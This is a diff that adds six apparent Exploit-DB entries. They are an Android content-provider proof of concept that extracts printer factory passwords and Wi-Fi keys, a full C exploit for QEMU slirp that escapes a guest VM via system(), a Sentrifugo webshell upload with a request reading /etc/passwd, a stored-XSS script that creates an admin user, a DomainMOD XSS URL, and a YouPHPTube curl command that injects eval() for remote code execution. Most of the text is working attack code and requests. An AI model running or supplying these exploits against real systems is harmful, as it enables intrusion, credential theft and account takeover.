diff --git a/exploits/android/local/47321.txt b/exploits/android/local/47321.txt new file mode 100644 index 000000000..9f51504eb --- /dev/null +++ b/exploits/android/local/47321.txt @@ -0,0 +1,129 @@ +# Exploit Title: Content Provider URI Injection on Canon PRINT 2.5.5 +(CVE-2019-14339) +# Date: 24th July, 2019 +# Exploit Author: 0x48piraj +# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home/explore/printing-innovations/mobile-printing/canon-print-app +# Software Link: https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint +# +Exploit : https://github.com/0x48piraj/CVE-2019-14339 +# Version: Canon PRINT 2.5.5 +# Tested on: Android 8.0.0 +# CVE : CVE-2019-14339 + +The ContentProvider in the Canon PRINT 2.5.5 application for Android +does not properly restrict data access. This allows an attacker's +malicious application to obtain sensitive information including +factory passwords for administrator web-interface and WPA2-PSK key. +The mobile application contains unprotected exported content providers +('IJPrinterCapabilityProvider' in android/AndroidManifest.xml) that +discloses sensitive application’s data under certain conditions. To +securely export the content provider, one should restrict access to it +by setting up android:protectionLevel or android:grantUriPermissions +attributes in Android Manifest file. + +-- Proof-of-concept code (Java) + +-- + +package cannon.print.pwn; + +import android.database.Cursor; +import android.net.Uri; +import android.support.v7.app.AppCompatActivity; +import android.os.Bundle; +import android.view.View; +import android.widget.Button; +import android.widget.TextView; +import android.widget.Toast; +import org.apache.commons.lang3.StringUtils; // +https://stackoverflow.com/a/50198499 + +public class MainActivity extends AppCompatActivity { + + Button PwnBtn; + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + setContentView(R.layout.activity_main); + PwnBtn = (Button) findViewById(R.id.button); + PwnBtn.setOnClickListener(new View.OnClickListener() { + @Override + public void onClick(View view) { + Toast.makeText(getApplicationContext(), "Payload +triggered ...", Toast.LENGTH_SHORT).show(); + Uri cannonURI = +Uri.parse("content://canon.ij.printer.capability.data/"); + Cursor cursor = getContentResolver().query(cannonURI, +null, null, null, null); + int count = cursor.getCount(); + TextView data=(TextView)findViewById(R.id.data); + data.setText(String.valueOf(count)); + cursor.moveToFirst(); + String tempstr = " "; + tempstr =" "+tempstr +"\t"+ cursor.getString(0) + "\t\t\t" + + cursor.getString(1) + "\t\t\t" + cursor.getString(2); + String dpw = StringUtils.substringBetween(tempstr, +"", ""); + String dmac = cursor.getString(4); + String mdeviceid = cursor.getString(13); // raw + String dtype = StringUtils.substringBetween(mdeviceid, +";CLS:", ";DES"); + String timestamp = cursor.getString(15); // ticks, +device last used + String dclass = StringUtils.substringBetween(tempstr, +"", ""); + String dmodel = StringUtils.substringBetween(tempstr, +"", ""); + String dserial = StringUtils.substringBetween(tempstr, +"", ""); + String dfmver = StringUtils.substringBetween(tempstr, +"", ""); + String dservice = +StringUtils.substringBetween(tempstr, "", +""); + /* More juicy data + String denv = StringUtils.substringBetween(tempstr, +"", ""); + String dpapertype = +StringUtils.substringBetween(tempstr, "", +""); + String dformats = +StringUtils.substringBetween(tempstr, "", +""); + */ + String fout = String.format("Device Type : %s\nDevice +Class : %s\nDevice Model : %s\nDevice Serial : %s\nDevice MAC Address +: %s\nDevice Factory Password : %s\nDevice Firmware Version : +%s\nDevice Services : %s\nDevice Last Used : %s\n", dtype, dclass, +dmodel, dserial, dmac, dpw, dfmver, dservice, timestamp); + data.setText(fout); + } + }); + } +} + +-- Proof-of-concept python script over ADB -- + +import subprocess, datetime, sys + +def ext(out, var, rw=';'): + return out.split(var)[1].split(rw)[0] + +print("[#] Make sure you've connected the target device w/ adb ...") +print("[*] Running the exploit using adb ...\n\n") +out = subprocess.getoutput("adb shell content query --uri content://canon.ij.printer.capability.data/") + +if "" not in out: + print("[!] Error: Couldn't fetch data from adb ...") + sys.exit(1) + +varz = [";CLS:", ";MDL:", ";DES:", ";VER:", ";PSE:"] # +factory_pw_check = +out.split("")[1].split('')[0] +prmz = ["Class", "Model", "Description", "Firmware Version", "Factory Password"] +for prm, var in zip(prmz, varz): + print(" -- Device %s : %s" % (prm, ext(out, var))) +print(" -- Device MAC Address : {}".format(ext(out, 'mmacaddress=', ','))) +print(" -- Device Last Used : %s" % (datetime.timedelta(microseconds = +int(ext(out,', timestamp=', ', '))/10))) \ No newline at end of file diff --git a/exploits/linux/remote/47320.c b/exploits/linux/remote/47320.c new file mode 100644 index 000000000..2f7cf41b1 --- /dev/null +++ b/exploits/linux/remote/47320.c @@ -0,0 +1,656 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define die(x) do { \ + perror(x); \ + exit(EXIT_FAILURE); \ + }while(0); + +// * * * * * * * * * * * * * * * Constans * * * * * * * * * * * * * * * * * * + +#define SRC_ADDR "10.0.2.15" +#define DST_ADDR "10.0.2.2" + +#define INTERFACE "ens3" + +#define ETH_HDRLEN 14 // Ethernet header length +#define IP4_HDRLEN 20 // IPv4 header length +#define ICMP_HDRLEN 8 // ICMP header length for echo request, excludes data +#define MIN_MTU 12000 + +// * * * * * * * * * * * * * * * QEMU Symbol offset * * * * * * * * * * * * * * * * * * + +#define SYSTEM_PLT 0x029b290 +#define QEMU_CLOCK 0x10e8200 +#define QEMU_TIMER_NOTIFY_CB 0x2f4bff +#define MAIN_LOOP_TLG 0x10e81e0 +#define CPU_UPDATE_STATE 0x488190 + +// Some place in bss which is not used to craft fake stucts +#define FAKE_STRUCT 0xf43360 + +// * * * * * * * * * * * * * * * QEMU Structs * * * * * * * * * * * * * * * * * * + +struct mbuf { + struct mbuf *m_next; /* Linked list of mbufs */ + struct mbuf *m_prev; + struct mbuf *m_nextpkt; /* Next packet in queue/record */ + struct mbuf *m_prevpkt; /* Flags aren't used in the output queue */ + int m_flags; /* Misc flags */ + + int m_size; /* Size of mbuf, from m_dat or m_ext */ + struct socket *m_so; + + char * m_data; /* Current location of data */ + int m_len; /* Amount of data in this mbuf, from m_data */ + + void *slirp; + char resolution_requested; + u_int64_t expiration_date; + char *m_ext; + /* start of dynamic buffer area, must be last element */ + char * m_dat; +}; + + +struct QEMUTimer { + int64_t expire_time; /* in nanoseconds */ + void *timer_list; + void *cb; + void *opaque; + void *next; + int scale; +}; + + +struct QEMUTimerList { + void * clock; + char active_timers_lock[0x38]; + struct QEMUTimer *active_timers; + struct QEMUTimerList *le_next; /* next element */ \ + struct QEMUTimerList **le_prev; /* address of previous next element */ \ + void *notify_cb; + void *notify_opaque; + + /* lightweight method to mark the end of timerlist's running */ + size_t timers_done_ev; +}; + + + +// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * * + +int raw_socket; +int recv_socket; +int spray_id; +int idx; +char mac[6]; + +void * code_leak; +void * heap_leak; + +void *Malloc(size_t size) { + void * ptr = calloc(size,1); + if (!ptr) { + die("malloc() failed to allocate"); + } + return ptr; +} + +unsigned short in_cksum(unsigned short *ptr,int nbytes) { + +register long sum; /* assumes long == 32 bits */ + u_short oddbyte; + register u_short answer; /* assumes u_short == 16 bits */ + + /* + * Our algorithm is simple, using a 32-bit accumulator (sum), + * we add sequential 16-bit words to it, and at the end, fold back + * all the carry bits from the top 16 bits into the lower 16 bits. + */ + + sum = 0; + while (nbytes > 1) { + sum += *ptr++; + nbytes -= 2; +} + +/* mop up an odd byte, if necessary */ +if (nbytes == 1) { +oddbyte = 0; /* make sure top half is zero */ +*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */ +sum += oddbyte; +} + +/* + * Add back carry outs from top 16 bits to low 16 bits. + */ + +sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */ +sum += (sum >> 16); /* add carry */ +answer = ~sum; /* ones-complement, then truncate to 16 bits */ +return(answer); +} + +void hex_dump(char *desc, void *addr, int len) +{ + int i; + unsigned char buff[17]; + unsigned char *pc = (unsigned char*)addr; + if (desc != NULL) + printf ("%s:\n", desc); + for (i = 0; i < len; i++) { + if ((i % 16) == 0) { + if (i != 0) + printf(" %s\n", buff); + printf(" %04x ", i); + } + printf(" %02x", pc[i]); + if ((pc[i] < 0x20) || (pc[i] > 0x7e)) { + buff[i % 16] = '.'; + } else { + buff[i % 16] = pc[i]; + } + buff[(i % 16) + 1] = '\0'; + } + while ((i % 16) != 0) { + printf(" "); + i++; + } + printf(" %s\n", buff); +} + +char * ethernet_header(char * eth_hdr){ + + /* src MAC : 52:54:00:12:34:56 */ + memcpy(ð_hdr[6],mac,6); + + // Next is ethernet type code (ETH_P_IP for IPv4). + // http://www.iana.org/assignments/ethernet-numbers + eth_hdr[12] = ETH_P_IP / 256; + eth_hdr[13] = ETH_P_IP % 256; + return eth_hdr; +} + +void ip_header(struct iphdr * ip ,u_int32_t src_addr,u_int32_t dst_addr,u_int16_t payload_len, + u_int8_t protocol,u_int16_t id,uint16_t frag_off){ + + /* rfc791 */ + ip->ihl = IP4_HDRLEN / sizeof (uint32_t); + ip->version = 4; + ip->tos = 0x0; + ip->tot_len = htons(IP4_HDRLEN + payload_len); + ip->id = htons(id); + ip->ttl = 64; + ip->frag_off = htons(frag_off); + ip->protocol = protocol; + ip->saddr = src_addr; + ip->daddr = dst_addr; + ip->check = in_cksum((unsigned short *)ip,IP4_HDRLEN); +} + +void icmp_header(struct icmphdr *icmp, char *data, size_t size) { + + /* rfc792 */ + icmp->type = ICMP_ECHO; + icmp->code = 0; + icmp->un.echo.id = htons(0); + icmp->un.echo.sequence = htons(0); + if (data) { + char * payload = (char * )icmp+ ICMP_HDRLEN; + memcpy(payload, data, size); + } + + icmp->checksum = in_cksum((unsigned short *)icmp, ICMP_HDRLEN + size); + +} + +void send_pkt(char *frame, u_int32_t frame_length) { + + struct sockaddr_ll sock; + sock.sll_family = AF_PACKET; + sock.sll_ifindex = idx; + sock.sll_halen = 6; + memcpy (sock.sll_addr, mac, 6 * sizeof (uint8_t)); + + if(sendto(raw_socket,frame,frame_length,0x0,(struct sockaddr *)&sock, + sizeof(sock))<0) + die("sendto()"); +} + +void send_ip4(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) { + + u_int32_t src_addr, dst_addr; + src_addr = inet_addr(SRC_ADDR); + dst_addr = inet_addr(DST_ADDR); + + char * pkt = Malloc(IP_MAXPACKET); + struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + + ethernet_header(pkt); + u_int16_t payload_len = size; + ip_header(ip,src_addr,dst_addr,payload_len,IPPROTO_ICMP,id,frag_off); + + if(data) { + char * payload = (char *)pkt + ETH_HDRLEN + IP4_HDRLEN; + memcpy(payload, data, payload_len); + } + + u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + payload_len; + send_pkt(pkt,frame_length); + free(pkt); +} + +void send_icmp(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) { + + char * pkt = Malloc(IP_MAXPACKET); + struct icmphdr * icmp = (struct icmphdr * )(pkt); + + if(!data) + data = Malloc(size); + icmp_header(icmp,data,size); + + u_int32_t len = ICMP_HDRLEN + size; + send_ip4(id,len,pkt,frag_off); + free(pkt); + } + +// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * * + +void initialize() { + int sd; + struct ifreq ifr; + char interface[40]; + int mtu; + + srand(time(NULL)); + strcpy (interface, INTERFACE); + + // Submit request for a socket descriptor to look up interface. + if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { + die("socket() failed to get socket descriptor for using ioctl()"); + } + // Use ioctl() to get interface maximum transmission unit (MTU). + memset (&ifr, 0, sizeof (ifr)); + strcpy (ifr.ifr_name, interface); + if (ioctl (sd, SIOCGIFMTU, &ifr) < 0) { + die("ioctl() failed to get MTU "); + } + mtu = ifr.ifr_mtu; + printf ("MTU of interface %s : %i\n", interface, mtu); + if (mtu < MIN_MTU) { + printf("Run\n$ ip link set dev %s mtu 12000\n",interface); + die(""); + } + + // Use ioctl() to look up interface name and get its MAC address. + memset (&ifr, 0, sizeof (ifr)); + snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface); + if (ioctl (sd, SIOCGIFHWADDR, &ifr) < 0) { + die("ioctl() failed to get source MAC address "); + } + memcpy (mac, ifr.ifr_hwaddr.sa_data, 6 * sizeof (uint8_t)); + printf ("MAC %s :", interface); + for (int i=0; i<5; i++) { + printf ("%02x:", mac[i]); + } + printf ("%02x\n", mac[5]); + + // Use ioctl() to look up interface index which we will use to + // bind socket descriptor sd to specified interface with setsockopt() since + // none of the other arguments of sendto() specify which interface to use. + memset (&ifr, 0, sizeof (ifr)); + snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface); + if (ioctl (sd, SIOCGIFINDEX, &ifr) < 0) { + die("ioctl() failed to find interface "); + } + + close (sd); + printf ("Index for interface %s : %i\n", interface, ifr.ifr_ifindex); + idx = ifr.ifr_ifindex; + + if((raw_socket = socket(PF_PACKET, SOCK_RAW, htons (ETH_P_ALL)))==-1) + die("socket() failed to obtain raw socket"); + + + /* Bind socket to interface index. */ + if (setsockopt (raw_socket, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof (ifr)) < 0) { + die("setsockopt() failed to bind to interface "); + } + + printf("Initialized socket discriptors\n"); +} + + +void spray(uint32_t size, u_int32_t count) { + printf("Spraying 0x%x x ICMP[0x%x]\n",count,size); + int s; + u_int16_t frag_off; + char * data; + + for (int i = 0; i < count; i++) { + send_icmp(spray_id + i,size, NULL, IP_MF); + } +} + +void arbitrary_write(void *addr, size_t addrlen, char *payload, size_t size, + size_t spray_count) { + + spray(0x8, spray_count); + + + size_t id = spray_id + spray_count; + // Target + size_t target_id = id++; + send_ip4(target_id, 0x8, NULL, IP_MF); + + + // Padding + send_ip4(id++, 0x8, NULL, IP_MF); + send_ip4(id++, 0x8, NULL, IP_MF); + + // Piviot Point + size_t hole_1 = id++; + send_ip4(hole_1, 0x8, NULL, IP_MF); + + + // Padding + send_ip4(id++, 0xC30, NULL, IP_MF); + + // For creating hole + size_t hole_2 = id++; + send_ip4(hole_2, 0x8, NULL, IP_MF); + + // To prevent consolidation + send_ip4(id++, 0x8, NULL, IP_MF); + + // This should create the fist hole + send_ip4(hole_1, 0x8, NULL, 0x1); + + // This should create the second hole + send_ip4(hole_2, 0x8, NULL, 0x1); + + int m_data_off = -0x70; + int m_len = m_data_off; + addr = (void *)((size_t)addr + ((m_len * -1) - addrlen)); + if (addrlen != 0x8) { + m_len -= (0x8 - addrlen); + } + + size_t vuln_id = id++; + + char * pkt = Malloc(IP_MAXPACKET); + memset(pkt,0x0,IP_MAXPACKET); + struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + ethernet_header(pkt); + + u_int16_t pkt_len = 0xc90; + ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF); + u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len; + + // The mbuf of this packet will be placed in the second hole and + // m_ext buff will be placed on the first hole, We will write wrt + // to this. + send_pkt(pkt,frame_length); + + memset(pkt,0x0,IP_MAXPACKET); + ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + ethernet_header(pkt); + pkt_len = 0x8; + ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192); + frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len; + + // Trigger the bug to change target's m_len + send_pkt(pkt,frame_length); + + + // Underflow and write, to change m_data + char addr_buf[0x8] = {0}; + if (addrlen != 0x8) { + memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen); + } else { + memcpy(addr_buf,(char *)&addr,8); + } + send_ip4(target_id, 0x8, addr_buf, 0x1|IP_MF); + send_ip4(target_id, size, payload, 0x2); + + hex_dump("Writing Payload ", payload, size); +} + + +void recv_leaks(){ + /* Prepare recv sd */ + /* Submit request for a raw socket descriptor to receive packets. */ + int recvsd, fromlen, bytes, status; + struct sockaddr from; + char recv_ether_frame[IP_MAXPACKET]; + struct iphdr *recv_iphdr = (struct iphdr *)(recv_ether_frame + ETH_HDRLEN); + struct icmphdr *recv_icmphdr = + (struct icmphdr *)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN); + + for (;;) { + + memset(recv_ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t)); + memset(&from, 0, sizeof(from)); + fromlen = sizeof(from); + if ((bytes = recvfrom(recv_socket, recv_ether_frame, IP_MAXPACKET, 0, + (struct sockaddr *)&from, (socklen_t *)&fromlen)) < + 0) { + status = errno; + // Deal with error conditions first. + if (status == EAGAIN) { // EAGAIN = 11 + printf("Time out\n"); + } else if (status == EINTR) { // EINTR = 4 + continue; // Something weird happened, but let's keep listening. + } else { + perror("recvfrom() failed "); + exit(EXIT_FAILURE); + } + } // End of error handling conditionals. + + // Check for an IP ethernet frame, carrying ICMP echo reply. If not, ignore + // and keep listening. + if ((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) == ETH_P_IP) && + (recv_iphdr->protocol == IPPROTO_ICMP) && + (recv_icmphdr->type == ICMP_ECHOREPLY) && (recv_icmphdr->code == 0) && + (recv_icmphdr->checksum == 0xffff)) { + hex_dump("Recieved ICMP Replay : ", recv_ether_frame, bytes); + + code_leak = (void *)(*((size_t *)&recv_ether_frame[0x40]) - CPU_UPDATE_STATE); + size_t *ptr = (size_t *)(recv_ether_frame + 0x30); + for (int i = 0; i < (bytes / 0x8); i++) { + if ((ptr[i] & 0x7f0000000000) == 0x7f0000000000) { + heap_leak = (void *)(ptr[i] & 0xffffff000000); + break; + } + } + + printf("Host Code Leak : %p\n", code_leak); + printf("Host Heap Leak : %p\n", heap_leak); + break; + } + } +} + +void leak() { + u_int32_t src_addr, dst_addr; + src_addr = inet_addr(SRC_ADDR); + dst_addr = inet_addr(DST_ADDR); + + /* Crafting Fake ICMP Packet For Leak */ + char * pkt = Malloc(IP_MAXPACKET); + struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + struct icmphdr * icmp = (struct icmphdr * )(pkt+ETH_HDRLEN+IP4_HDRLEN); + ethernet_header(pkt); + ip_header(ip,src_addr,dst_addr,ICMP_HDRLEN,IPPROTO_ICMP,0xbabe,IP_MF); + + ip->tot_len = ntohs(ip->tot_len) - IP4_HDRLEN; + ip->id = ntohs(ip->id); + ip->frag_off = htons(ip->frag_off); + + icmp_header(icmp,NULL,0x0); + char * data = (char *)icmp + ICMP_HDRLEN + 8; + size_t pkt_len = ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN; + + spray_id = rand() & 0xffff; + arbitrary_write((void * )(0xb00-0x20),3,pkt,pkt_len+4,0x100); + + // This is same as the arbitrary write function + spray_id = rand() & 0xffff; + spray(0x8, 0x20); + size_t id = spray_id + 0x20; + + size_t replay_id = id++; + send_ip4(replay_id, 0x100, NULL, IP_MF); + + // Target + size_t target_id = id++; + send_ip4(target_id, 0x8, NULL, IP_MF); + + + // Padding + send_ip4(id++, 0x8, NULL, IP_MF); + send_ip4(id++, 0x8, NULL, IP_MF); + + // Piviot Point + size_t hole_1 = id++; + send_ip4(hole_1, 0x8, NULL, IP_MF); + + + // Padding + send_ip4(id++, 0xC30, NULL, IP_MF); + + // For creating hole + size_t hole_2 = id++; + send_ip4(hole_2, 0x8, NULL, IP_MF); + + // Prevent Consolidation + send_ip4(id++, 0x8, NULL, IP_MF); + + // This should create the fist hole + send_ip4(hole_1, 0x8, NULL, 0x1); + + // This should create the second hole + send_ip4(hole_2, 0x8, NULL, 0x1); + + // Trigger the bug to change target's m_len + int m_data_off = -0xd50; + int m_len = m_data_off; + size_t * addr = (size_t * )(0xb00 - 0x20 + ETH_HDRLEN + 0xe + 6) ; + size_t addrlen = 0x3; + + if (addrlen != 0x8) { + m_len -= (0x8 - addrlen); + } + + size_t vuln_id = id++; + + memset(pkt,0x0,IP_MAXPACKET); + ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + ethernet_header(pkt); + + pkt_len = 0xc90; + ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF); + u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len; + send_pkt(pkt,frame_length); + + + memset(pkt,0x0,IP_MAXPACKET); + ip = (struct iphdr * ) (pkt + ETH_HDRLEN); + ethernet_header(pkt); + pkt_len = 0x8; + ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192); + frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len; + send_pkt(pkt,frame_length); + + + // Underflow and write to change m_data + char addr_buf[0x8] = {0}; + if (addrlen != 0x8) { + memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen); + } else { + memcpy(addr_buf,(char *)&addr,8); + } + send_ip4(target_id, 0x8, addr_buf, 0x1); + + if ((recv_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) + die("socket() failed to obtain a receive socket descriptor"); + send_ip4(replay_id, 0x8, NULL, 0x20); + recv_leaks(); + + + char zero[0x28] = {0}; + spray_id = rand() & 0xffff; + printf("Cleaning Heap\n"); + arbitrary_write(heap_leak + (0xb00 - 0x20),3,zero,sizeof(zero),0x20); +} + + +void pwn() { + char payload[0x200] = {0}; + struct QEMUTimerList *tl = (struct QEMUTimerList *)payload; + struct QEMUTimer *ts = + (struct QEMUTimer *)(payload + sizeof(struct QEMUTimerList)); + + char cmd[] = "/usr/bin/gnome-calculator"; + memcpy((void *)(payload + sizeof(struct QEMUTimerList ) \ + +sizeof(struct QEMUTimer )), \ + (void *)cmd,sizeof(cmd)); + + void * fake_timer_list = code_leak + FAKE_STRUCT; + void * fake_timer = fake_timer_list + sizeof(struct QEMUTimerList); + + void *system = code_leak + SYSTEM_PLT; + void *cmd_addr = fake_timer + sizeof(struct QEMUTimer); + /* Fake Timer List */ + tl->clock = (void *)(code_leak + QEMU_CLOCK); + *(size_t *)&tl->active_timers_lock[0x30] = 0x0000000100000000; + tl->active_timers = fake_timer; + tl->le_next = 0x0; + tl->le_prev = 0x0; + tl->notify_cb = code_leak + QEMU_TIMER_NOTIFY_CB; + tl->notify_opaque = 0x0; + tl->timers_done_ev = 0x0000000100000000; + + /*Fake Timer structure*/ + ts->timer_list = fake_timer_list; + ts->cb = system; + ts->opaque = cmd_addr; + ts->scale = 1000000; + ts->expire_time = -1; + + spray_id = rand() & 0xffff; + size_t payload_size = + sizeof(struct QEMUTimerList) + sizeof(struct QEMUTimerList) + sizeof(cmd); + + printf("Writing fake structure : %p\n",fake_timer_list); + arbitrary_write(fake_timer_list,8,payload,payload_size,0x20); + + spray_id = rand() & 0xffff; + void * main_loop_tlg = code_leak + MAIN_LOOP_TLG; + printf("Overwriting main_loop_tlg %p\n",main_loop_tlg); + arbitrary_write(main_loop_tlg,8,(char *)&fake_timer_list,8,0x20); +} + +int main() { + initialize(); + leak(); + pwn(); + return 0; +} \ No newline at end of file diff --git a/exploits/php/webapps/47323.txt b/exploits/php/webapps/47323.txt new file mode 100644 index 000000000..091c27aec --- /dev/null +++ b/exploits/php/webapps/47323.txt @@ -0,0 +1,64 @@ +# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass +# Google Dork: N/A +# Date: 8/29/2019 +# Exploit Author: creosote +# Vendor Homepage: http://www.sentrifugo.com/ +# Version: 3.2 +# Tested on: Ubuntu 18.04 +# CVE : CVE-2019-15813 + +Multiple File Upload Restriction Bypass vulnerabilities were found in Sentrifugo 3.2. This allows for an authenticated user to potentially obtain RCE via webshell. + +File upload bypass locations: + +/sentrifugo/index.php/mydetails/documents -- Self Service >> My Details >> Documents (any permissions needed) +sentrifugo/index.php/policydocuments/add -- Organization >> Policy Documents (higher permissions needed) + + +# POC + +1. Self Service >> My Details >> Documents >> add New Document (/sentrifugo/index.php/mydetails/documents) +2. Turn Burp Intercept On +3. Select webshell with valid extension - ex: shell.php.doc +4. Alter request in the upload... + Update 'filename' to desired extension. ex: shell.php + Change content type to 'application/x-httpd-php' + +Example exploitation request: + +==================================================================================================== + +POST /sentrifugo/index.php/employeedocs/uploadsave HTTP/1.1 +Host: 10.42.1.42 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.42.1.42/sentrifugo/index.php/mydetails/documents +X-Requested-With: XMLHttpRequest +Content-Length: 494 +Content-Type: multipart/form-data; boundary=---------------------------205946976257369239535727507 +Cookie: PHPSESSID=vr0ik0kof2lpg0jlc9gp566qb5 +Connection: close + +-----------------------------205946976257369239535727507 +Content-Disposition: form-data; name="myfile"; filename="shell.php" +Content-Type: application/x-httpd-php + + + +-----------------------------205946976257369239535727507 +Content-Disposition: form-data; name="" + +undefined +-----------------------------205946976257369239535727507 +Content-Disposition: form-data; name="" + +undefined +-----------------------------205946976257369239535727507-- + +==================================================================================================== + +5. With intercept still on, Save the document and copy the 'file_new_names' parmeter from the new POST request. +6. Append above saved parameter and visit your new webshell + Ex: http://10.42.1.42/sentrifugo/public/uploads/employeedocs/1565996140_5_shell.php?cmd=cat /etc/passwd \ No newline at end of file diff --git a/exploits/php/webapps/47324.txt b/exploits/php/webapps/47324.txt new file mode 100644 index 000000000..a99a23d17 --- /dev/null +++ b/exploits/php/webapps/47324.txt @@ -0,0 +1,62 @@ +# Exploit Title: Sentrifugo 3.2 - Persistent Cross-Site Scripting +# Google Dork: N/A +# Date: 8/29/2019 +# Exploit Author: creosote +# Vendor Homepage: http://www.sentrifugo.com/ +# Version: 3.2 +# Tested on: Ubuntu 18.04 +# CVE : CVE-2019-15814 + + +Multiple Stored XSS vulnerabilities were found in Sentrifugo 3.2. In most test cases session riding was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover. + +/sentrifugo/index.php/employee/edit/id/5 <--Attacker employee ID here. POC example pertains to this one. +/sentrifugo/index.php/feedforwardquestions/add +/sentrifugo/index.php/announcements/add + +# Proof of Concept + +A low privileged user can insert a stored XSS referencing a crafted js file that would ride a session of an admin user to create an additional admin user. Logged in as the low priv user, insert the following in "Certificate Description" (Self Service >> My Details >> Training and Certificate Details) + + + +Add the following 'add-admin-user.js' file hosted on your attacking machine. This request will need to be customized per instance of Sentrifugo. + +A few crafting notes: + +- 'employeeId' - this can be found in the users profile. +- 'employeeNumId' - this can be an arbitrary number as long as it does not exist. +- 'emprole' - in this test case '2_1' was the Administrator role +- 'emp_status_id' - based off "Contractor", "Full-Time", etc. Contractor is '6' in this case. +- 'emailaddress' - by default the initial password is sent via email, so this will need to be valid in order to login. + +---------------------------------------------------------------------------------------------------- + +function execute() +{ + var nuri ="http://10.42.1.42/sentrifugo/index.php/employee/add"; + xhttp = new XMLHttpRequest(); + xhttp.open("POST", nuri, true); + xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + xhttp.withCredentials = "true"; + var body = ""; + body += "\r\n\r\n"; + body += + "id=&final_emp_id=EMPP99&tmp_emp_name=Select+Candidate&employeeId=EMPP&employeeNumId=99" + + "&firstname=Bob&lastname=Blah&modeofentry=Direct&emprole=2_1&emailaddress=bob%40localhost.com" + + "&businessunit_id=0&reporting_manager=2&emp_status_id=6&screenflag=add&date_of_joining=07%2F04%2F2019&submit=Save"; + xhttp.send(body); + return true; +} + +execute(); + +---------------------------------------------------------------------------------------------------- + +When a user with permissions to add users (HR role by default) views your XSS "Certification Description" the add user request should be sent. + +Other session riding request that can possibly be crafted: +- Company Announcement - gets blasted out to all users. Also has an additional XSS vuln in the description. +- Add Employee Leave - this one is tricky to craft due to needed parameter knowledge. +- Background check - update or add employee background check status. +- Disciplinary Actions - manipulate existent or non-existent disciplinary records. \ No newline at end of file diff --git a/exploits/php/webapps/47325.txt b/exploits/php/webapps/47325.txt new file mode 100644 index 000000000..54bd600f3 --- /dev/null +++ b/exploits/php/webapps/47325.txt @@ -0,0 +1,19 @@ +# Exploit Title: DomainMod <= 4.13 - Cross-Site Scripting +# Date: 30 August 2019 +# Exploit Author: Damian Ebelties (https://zerodays.lol/) +# Vendor Homepage: https://domainmod.org/ +# Version: <= 4.13 +# Tested on: Ubuntu 18.04.1 +# CVE: CVE-2019-15811 + +The software 'DomainMOD' is vulnerable for Cross-Site Scripting in the +file '/reporting/domains/cost-by-month.php' in the parameter 'daterange'. + +As of today (30 August 2019) this issue is unfixed. + +Almost all other files that use the parameter 'daterange' are vulnerable. +See: https://github.com/domainmod/domainmod/tree/master/reporting/domains + +Proof-of-Concept: + + https://domain.tld/reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(1)%22autofocus=%22 \ No newline at end of file diff --git a/exploits/php/webapps/47326.txt b/exploits/php/webapps/47326.txt new file mode 100644 index 000000000..57ab65715 --- /dev/null +++ b/exploits/php/webapps/47326.txt @@ -0,0 +1,23 @@ +# Exploit Title: YouPHPTube <= 7.4 - Remote Code Execution +# Google Dork: intext:"Powered by YouPHPTube" +# Date: 29 August 2019 +# Exploit Author: Damian Ebelties (https://zerodays.lol/) +# Vendor Homepage: https://www.youphptube.com/ +# Version: <= 7.4 +# Tested on: Ubuntu 18.04.1 + +YouPHPTube before 7.5 does no checks at all if you wanna generate a new +config file. We can use this to generate our own config file with our +own (malicious) code. + +All you need is a MySQL server that allows remote connections. + +Fixed by the following commit: + + https://github.com/YouPHPTube/YouPHPTube/commit/b32b410c9191c3c5db888514c29d7921f124d883 + +Proof-of-Concept: + + # Run this command (with your own data replaced) + # Then visit https://domain.tld/?zerodayslol=phpinfo() for code execution! + curl -s "https://domain.tld/install/checkConfiguration.php" --data "contactEmail=rce@zerodays.lol&createTables=2&mainLanguage=RCE&salt=';eval(\$_REQUEST['zerodayslol']);echo 